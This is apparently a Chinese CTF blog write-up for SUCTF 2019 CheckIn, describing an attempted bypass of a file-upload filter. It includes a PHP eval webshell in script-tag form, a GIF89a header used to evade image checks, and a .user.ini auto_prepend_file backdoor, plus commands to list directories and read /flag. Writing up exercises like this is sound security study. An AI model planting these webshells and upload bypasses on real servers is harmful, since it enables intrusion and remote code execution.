练习 9 Web [SUCTF 2019]CheckIn (未拿到flag)

  • 开发
  • 19

上传图片格式的木马文件:
返回 <? in contents!,存在PHP代码检测
上传非图片格式文件:
返回 不允许非image
在这里插入图片描述

修改木马PHP代码规避检测

<? ?> 改为 < script language=“php”>< /script >

<?php @eval($_POST['shell']);?> 

<script language='php'>@eval($_POST['shell']);</script>

在这里插入图片描述
上传强行加上gif文件头的GIF图片木马

GIF89a?<script language='php'>@eval($_POST['shell']);</script>

返回如下内容:上传文件位置

在这里插入图片描述
现在传上去,因为还是图片格式文件,没有办法执行
尝试在“练习5”中提到的.htaccess文件,发现也被过滤了

卡住,搜索其他wp
新内容:user.ini文件
[SUCTF 2019]CheckIn 1
user.ini文件构成的PHP后门
BUUCTF | [SUCTF 2019]CheckIn

因为本题过滤非图片格式,所以必须加上前面的“GIF89a”

GIF89a                  //绕过exif_imagetype()
auto_prepend_file=a.jpg //指定在主文件之前自动解析的文件的名称,并包含该文件,就像使用require函数调用它一样。
auto_append_file=a.jpg  //解析后进行包含

在这里插入图片描述
uploads/18de044ce1c88142786756f6f8015474/index.php
cmd=var_dump(scandir(“/”));
cmd=var_dump(file_get_contents(“/flag”));

但最后始终刷不出来,不知道什么情况,蚁剑也死活连不上
在这里插入图片描述

阅读全部

相关推荐

  5. 业余无线电学习从入门证(A证。12.23考试)(完待续)

    2024-03-21 06:42:05       60 阅读

最近更新

  4. TCP协议是安全的吗?

    2024-03-21 06:42:05       18 阅读

  12. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-03-21 06:42:05       19 阅读

  13. 【Python教程】压缩PDF文件大小

    2024-03-21 06:42:05       18 阅读

  18. 通过文章id递归查询所有评论(xml)

    2024-03-21 06:42:05       20 阅读

热门阅读

  1. Python基础----数据容器(持续更新中)

    2024-03-21 06:42:05       21 阅读

  3. 获取比特币和莱特币的实时价格

    2024-03-21 06:42:05       18 阅读

  8. 记录新人的web3之旅

    2024-03-21 06:42:05       18 阅读

  10. vue3+vite+Electron构建跨平台应用

    2024-03-21 06:42:05       21 阅读

  12. 深入理解Electron应用结构:主进程与渲染进程详解

    2024-03-21 06:42:05       20 阅读

  13. MATLAB/Simulink 学习路径 chhttty个人博客总目录 参见

    2024-03-21 06:42:05       22 阅读

  18. 什么是AJAX?如何使用AJAX实现异步数据传输?

    2024-03-21 06:42:05       22 阅读

  19. uniapp canvas文字和元素居中

    2024-03-21 06:42:05       23 阅读

  29. 面试九 设计模式

    2024-03-21 06:42:05       18 阅读

  30. 已解决redis.clients.jedis.exceptions.JedisBusyException:无法处理命令异常的正确解决方法,亲测有效!!!

    2024-03-21 06:42:05       20 阅读